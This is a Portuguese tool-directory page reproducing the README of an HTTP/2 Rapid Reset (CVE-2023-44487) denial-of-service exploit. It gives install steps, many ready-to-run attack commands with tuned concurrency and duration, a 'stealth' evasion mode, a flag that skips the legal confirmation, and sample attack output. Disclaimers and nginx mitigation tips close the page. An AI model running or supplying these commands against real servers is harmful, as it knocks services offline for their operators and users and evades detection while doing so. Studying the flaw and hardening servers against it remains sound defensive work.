Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit — Framework avançado de exploração da vulnerabilidade CVE-2023-44487 HTTP/2 Rapid Reset. Inclui ataques concorrentes de múltiplas conexões, controle adaptativo de taxa, modo furtivo com cabeçalhos aleatórios, métricas em tempo real e relatórios de avaliação de risco. Apenas para testes de penetração autorizados. Por Sudeepa Wanigarathna | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoRed TeamingAtaque Adversário
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

Ver Repositório
14há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Framework avançado de exploração da vulnerabilidade CVE-2023-44487 HTTP/2 Rapid Reset. Inclui ataques concorrentes de múltiplas conexões, controle adaptativo de taxa, modo furtivo com cabeçalhos aleatórios, métricas em tempo real e relatórios de avaliação de risco. Apenas para testes de penetração autorizados. Por Sudeepa Wanigarathna

Compartilhar

CVE-2023-44487 — Exploit de DoS HTTP/2 por Reset Rápido

Edição Profissional v1.0.1 | Autor: Sudeepa Wanigarathna

Python Version License Version CVSS


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Recursos
  • Requisitos
  • Instalação
  • Início Rápido
  • Guia de Uso
  • Opções de Configuração
  • Suporte a Docker
  • Exemplos
  • Entendendo os Resultados
Recomendações de Segurança
  • Aviso Legal
  • Autor
  • Histórico de Alterações

  • Visão Geral

    Uma estrutura de avaliação de nível profissional para CVE-2023-44487, a vulnerabilidade de Reset Rápido (Rapid Reset) do HTTP/2. Esta ferramenta ajuda profissionais de segurança a testar e validar sistemas contra uma das condições de DoS HTTP/2 mais impactantes divulgadas nos últimos anos.

    Ela demonstra como a criação e o reset rápidos de streams HTTP/2 podem esgotar os recursos do servidor e levar a condições de Negação de Serviço (DoS).

    Principais Recursos em Resumo

    • Mecanismo de Ataque Multi-Conexão — Conexões HTTP/2 concorrentes
    • Controle de Taxa Adaptativo — Ajuste dinâmico para máxima eficácia
    • Modo Furtivo (Stealth) — Cabeçalhos aleatórios e rotação de conexões
    • Relatórios Abrangentes — JSON/CSV com avaliação de risco
    • Suporte a Docker — Implantação conteinerizada
    • Monitoramento em Tempo Real — Métricas de ataque e progresso ao vivo
    • Logging Profissional — Saída de console colorida com registro em arquivo
    UsoResultados

    Detalhes da Vulnerabilidade

    CVE-2023-44487: Ataque de Reset Rápido HTTP/2

    AtributoValor
    ID CVECVE-2023-44487
    Pontuação CVSS7.5 (Alto)
    Vetor de AtaqueRede
    Complexidade do AtaqueBaixa
    ImpactoNegação de Serviço (Exaustão de Recursos)
    Protocolos AfetadosHTTP/2
    Data de DivulgaçãoOutubro de 2023

    Visão Técnica

    A vulnerabilidade explora o mecanismo de gerenciamento de streams do protocolo HTTP/2:

    1. Criação de Stream — O cliente envia um frame HEADERS para criar um novo stream
    2. Reset Imediato — O cliente envia imediatamente um frame RST_STREAM
    3. Processamento pelo Servidor — O servidor deve processar ambos os frames, consumindo recursos
    4. Exaustão de Recursos — Ciclos repetidos sobrecarregam os recursos do servidor

    Impacto

    • Exaustão de recursos em servidores HTTP/2
    • Potencial Negação de Serviço (DoS)
    • Pode afetar balanceadores de carga, proxies e CDNs
    • Nenhuma autenticação ou privilégios especiais são necessários

    Recursos

    Recursos Principais

    RecursoDescrição
    Suporte a HTTP/2Implementação completa do protocolo HTTP/2 usando a biblioteca h2
    Multi-ConexãoAtaque concorrente em múltiplas conexões
    SSL/TLSSuporte a HTTPS com opções de verificação de certificado
    Controle de Taxa AdaptativoAjusta dinamicamente a taxa de ataque com base na resposta do servidor
    Modo FurtivoCabeçalhos aleatórios e rotação de conexões
    Monitoramento em Tempo RealExibição de métricas ao vivo durante a execução
    Relatórios AbrangentesSaída JSON/CSV com avaliação de risco
    Suporte a DockerImplantação conteinerizada para testes fáceis

    Capacidades Avançadas

    • Suporte a Proxy — Configuração de proxy extensível
    • Pool de Conexões — Gerenciamento eficiente de conexões
    • Recuperação de Erros — Tratamento gracioso de falhas de conexão
    • Ajuste de Desempenho — Configurações ajustáveis para diferentes cenários
    • Integração CI/CD — Adequado para testes de segurança automatizados

    Requisitos

    Requisitos de Sistema

    ComponenteMínimoRecomendado
    SOLinux / macOS / WindowsLinux ou macOS
    Python3.7+3.11+
    CPU2 núcleos4+ núcleos
    RAM2GB4GB+
    Rede100Mbps1Gbps+

    Dependências

    root@kitploit:~
    h2>=4.1.0,<5.0.0
    aiohttp>=3.8.0,<4.0.0
    

    Instalação

    1. Instalação Rápida

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
    
    # Install dependencies
    pip install -r requirements.txt
    
    # Verify installation
    python3 cve-2023-44487-exploit.py --help
    

    2. Ambiente Virtual (Recomendado)

    root@kitploit:~
    # Create virtual environment
    python3 -m venv venv
    
    # Activate virtual environment
    # On Linux/macOS:
    source venv/bin/activate
    # On Windows:
    venv\Scripts\activate
    
    # Install dependencies
    pip install -r requirements.txt
    

    3. Instalação via Docker

    root@kitploit:~
    # Build Docker image
    docker build -t cve-2023-44487-exploit .
    
    # Run with Docker
    docker run --rm cve-2023-44487-exploit target.com
    

    4. Instalação Manual

    root@kitploit:~
    # Install without requirements.txt
    pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"
    
    # Download the exploit
    wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py
    
    # Make executable
    chmod +x cve-2023-44487-exploit.py
    

    Início Rápido

    Uso Básico

    root@kitploit:~
    # Simple run with default settings
    python3 cve-2023-44487-exploit.py example.com
    
    # Test HTTPS on port 443
    python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify
    
    # Test HTTP on port 80
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    

    Teste Rápido (5 segundos)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    Avaliação Completa (60 segundos)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify
    

    Guia de Uso

    Opções de Linha de Comando

    Configuração do Alvo

    OpçãoDescriçãoPadrão
    hostNome de host ou IP do alvoObrigatório
    -p, --portPorta do alvo443
    --no-sslDesabilitar SSL/TLSFalse
    --no-verifyPular verificação SSLFalse

    Configuração do Ataque

    OpçãoDescriçãoPadrão
    -c, --connectionsNúmero de conexões concorrentes50
    -s, --streamsStreams por conexão1000
    -d, --durationDuração em segundos30
    --max-streamsMáximo total de streams100000
    --delayAtraso base entre operações0.0001s

    Opções Avançadas

    OpçãoDescriçãoPadrão
    --adaptiveControle de taxa adaptativoTrue
    --target-rpsRequisições alvo por segundo10000
    --stealthModo furtivo (cabeçalhos aleatórios)False
    --skip-validationPular validação do alvoFalse
    --forcePular a confirmação do aviso legalFalse

    Relatórios

    OpçãoDescriçãoPadrão
    -o, --outputNome do arquivo de saídaexploit_results.json
    --formatFormato de saída (json / csv / console)json
    -v, --verboseRegistro detalhado (verbose)False

    Opções de Configuração

    Use as flags de CLI acima para ajustar concorrência, volume de streams, duração e relatórios. Prefira valores menores de -c / -s / -d para validação inicial e aumente a escala somente em sistemas que você está autorizado a testar sob estresse.

    CenárioFlags sugeridas
    Teste de fumaça-c 10 -s 100 -d 5
    Avaliação padrão-c 50 -s 1000 -d 30
    Teste de laboratório de alta carga-c 100 -s 2000 -d 60 --stealth
    Certificado não confiável--no-verify
    HTTP simples-p 80 --no-ssl

    Suporte a Docker

    Construir a Imagem

    root@kitploit:~
    docker build -t cve-2023-44487-exploit .
    

    Executar Avaliação Básica

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com
    

    Executar com Parâmetros Personalizados

    root@kitploit:~
    docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60
    

    Salvar os Resultados Localmente

    root@kitploit:~
    docker run --rm -v "$(pwd)/results:/app/results" \
      cve-2023-44487-exploit target.com -o /app/results/report.json
    

    Modo Interativo

    root@kitploit:~
    docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit
    

    Docker Compose

    root@kitploit:~
    # Start with docker-compose
    docker-compose up
    
    # Run with a custom command
    docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60
    

    Exemplos

    1. Avaliação HTTPS Básica

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30
    

    2. Avaliação HTTP (Sem SSL)

    root@kitploit:~
    python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30
    

    3. Execução de Laboratório de Alto Desempenho

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000
    

    4. Modo Furtivo

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60
    

    5. Teste de Validação Rápido

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify
    

    6. Gerar Relatório CSV

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv
    

    7. Pular Validação

    root@kitploit:~
    python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30
    

    8. Teste de Produção Autorizado

    root@kitploit:~
    python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
      -c 100 -s 2000 -d 60 --stealth -o full_report.json
    

    Entendendo os Resultados

    Métricas de Saída

    MétricaDescriçãoInterpretação
    Total de StreamsNúmero de streams criadosContagem maior = mais carga gerada
    Resets Bem-SucedidosStreams redefinidos com sucessoNormalmente >90% em alvos vulneráveis
    Taxa de Reset (RPS)Resets por segundoTaxa maior = carga mais eficaz
    Taxa de SucessoPorcentagem de resets bem-sucedidos>90% geralmente indica exposição
    Erros de ConexãoConexões com falhaBaixo = conectividade estável
    Resets do ServidorResets iniciados pelo servidorAlto = medidas de proteção presentes

    Níveis de Avaliação de Risco

    NívelPontuaçãoSignificado
    CRÍTICO80–100Servidor altamente vulnerável
    ALTO60–79Servidor vulnerável, com alguma proteção
    MÉDIO40–59Alguma proteção em vigor
    BAIXO0–39Servidor bem protegido

    Exemplo de Saída

    root@kitploit:~
    ================================================================================
    EXPLOIT EXECUTION SUMMARY
    ================================================================================
    Target: target.com:443
    Duration: 30.00s
    Total Streams: 15,234
    Successful Resets: 15,198
    Reset Rate: 506.6/s
    Success Rate: 99.76%
    Connection Errors: 0
    --------------------------------------------------------------------------------
    RISK ASSESSMENT
    --------------------------------------------------------------------------------
    Risk Level: CRITICAL
    Risk Score: 95/100
    Factors:
      - Extremely high reset rate accepted
      - Very high success rate
    ================================================================================
    

    Recomendações de Segurança

    Para Administradores de Sistemas

    Ações Imediatas

    1. Aplicar Patches de Segurança

      • Atualize para as implementações HTTP/2 mais recentes
      • Aplique patches de segurança específicos do fornecedor
      • Atualize balanceadores de carga e proxies
    2. Implementar Limitação de Taxa

      root@kitploit:~
      # Nginx rate limiting example
      http {
          limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
          limit_req zone=http2 burst=20 nodelay;
      }
      
    3. Limites de Conexão

      root@kitploit:~
      # Limit connections per client
      limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
      limit_conn conn_zone 10;
      

    Endurecimento de Configuração

    ConfiguraçãoRecomendação
    Máximo de Streams ConcorrentesDefinir para 100–200 por conexão
    Taxa de Reset de StreamsLimitar a <100/seg por cliente
    Limite de ConexõesMáximo de 50–100 conexões por IP
    Valores de TimeoutReduzir timeouts de inatividade
    Limites de Tamanho de RequisiçãoLimitar tamanhos de cabeçalho e payload

    Monitoramento

    root@kitploit:~
    # Monitor HTTP/2 connections
    netstat -an | grep 443 | grep ESTABLISHED | wc -l
    
    # Monitor reset-related log entries (example)
    grep "RST_STREAM" /var/log/nginx/error.log | wc -l
    

    Controles de Segurança Recomendados

    • Limitação de Taxa — Implementar limites de streams por cliente
    • Limitação de Conexões — Limitar conexões por IP
    • Limites de Recursos — Definir valores de timeout de conexão
    • Monitoramento — Habilitar registro e alertas para anomalias
    • Regras de WAF — Implementar regras de WAF específicas para HTTP/2
    • Gerenciamento de Patches — Atualizações regulares de segurança
    • Resposta a Incidentes — Ter um plano para ataques DoS

    Aviso Legal

    IMPORTANTE: LEIA ISTO COM ATENÇÃO ANTES DE USAR ESTA FERRAMENTA

    Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais.

    Termos de Uso

    Ao usar esta ferramenta, você reconhece e concorda que:

    1. Você tem permissão explícita por escrito para testar o sistema alvo
    2. Você entende os riscos e o impacto potencial desta avaliação
    3. Você cumprirá todas as leis e regulamentações aplicáveis
    4. Você aceita total responsabilidade por suas ações
    5. Você não usará esta ferramenta para atividades não autorizadas

    Usos Proibidos

    Esta ferramenta NÃO deve ser usada para:

    • Testes ou ataques não autorizados
    • Negação de serviço contra sistemas que você não possui ou não tem permissão para testar
    • Interromper sistemas de produção sem autorização
    • Causar danos financeiros
    • Qualquer atividade ilegal

    Declaração de Responsabilidade

    O AUTOR E OS COLABORADORES FORNECEM ESTA FERRAMENTA "NO ESTADO EM QUE SE ENCONTRA" ("AS IS"), SEM QUALQUER GARANTIA. O USO DESTA FERRAMENTA É POR SUA CONTA E RISCO. O AUTOR NÃO É RESPONSÁVEL POR QUAISQUER DANOS OU QUESTÕES LEGAIS DECORRENTES DO USO DESTA FERRAMENTA.

    O uso não autorizado desta ferramenta pode violar leis, incluindo, mas não se limitando a:

    • Lei de Fraude e Abuso de Computador (CFAA) — EUA
    • Lei de Uso Indevido de Computador — Reino Unido
    • Regulamento Geral sobre a Proteção de Dados (GDPR) — UE
    • Outras leis locais, nacionais e internacionais relevantes

    Autor

    Sudeepa Wanigarathna

    • Pesquisador de Segurança e Testador de Penetração
    • Especializado em Segurança de Aplicações e Vulnerabilidades de Protocolos
    • GitHub
    • LinkedIn

    Histórico de Alterações

    Versão 1.0.1 (Atual)

    • Corrigido erro de atributo connection_attempts
    • Validação SSL/ALPN aprimorada
    • Adicionado tratamento de timeout
    • Recuperação de erros aprimorada
    • Adicionada a flag --skip-validation
    • Suporte a Docker aprimorado

    Versão 1.0.0 (Inicial)

    • Lançamento inicial da edição profissional
    • Mecanismo de ataque multi-conexão
    • Controle de taxa adaptativo
    • Modo furtivo
    • Relatórios abrangentes
    • Suporte a Docker

    Licença

    Este projeto é licenciado sob a Licença MIT — consulte o arquivo LICENSE para obter detalhes.


    Agradecimentos

    • Equipe do Protocolo HTTP/2
    • Pesquisadores de segurança que identificaram a CVE-2023-44487
    • Comunidade de código aberto (projetos h2, aiohttp)

    Referências

    • Entrada CVE-2023-44487 no NVD
    • Análise do Ataque de Reset Rápido HTTP/2
    • Especificação do Protocolo HTTP/2 (RFC 9113)
    • Aviso de Segurança HTTP/2 do Nginx
    • Guia de Segurança HTTP/2 do Apache

    Suporte

    Para problemas e dúvidas:

    • GitHub Issues: Envie um issue
    • E-mail: [email protected]
    • Contato de Segurança: Se você encontrar uma vulnerabilidade neste projeto, por favor, relate-a de forma responsável.

    Cartão de Referência Rápida

    root@kitploit:~
    # Quick Commands
    
    # Test HTTPS (skip cert verify)
    python3 cve-2023-44487-exploit.py target.com --no-verify
    
    # Test HTTP
    python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl
    
    # Quick test (5 seconds)
    python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5
    
    # Full assessment
    python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth
    
    # Skip validation
    python3 cve-2023-44487-exploit.py target.com --skip-validation
    
    # Docker
    docker run --rm cve-2023-44487-exploit target.com
    
    # Help
    python3 cve-2023-44487-exploit.py --help
    

    LEMBRETE: Sempre obtenha autorização adequada antes de testar qualquer sistema. Use esta ferramenta de forma responsável e ética.


    Mantido por Sudeepa Wanigarathna | Última atualização: Agosto de 2026

    Baixar ferramenta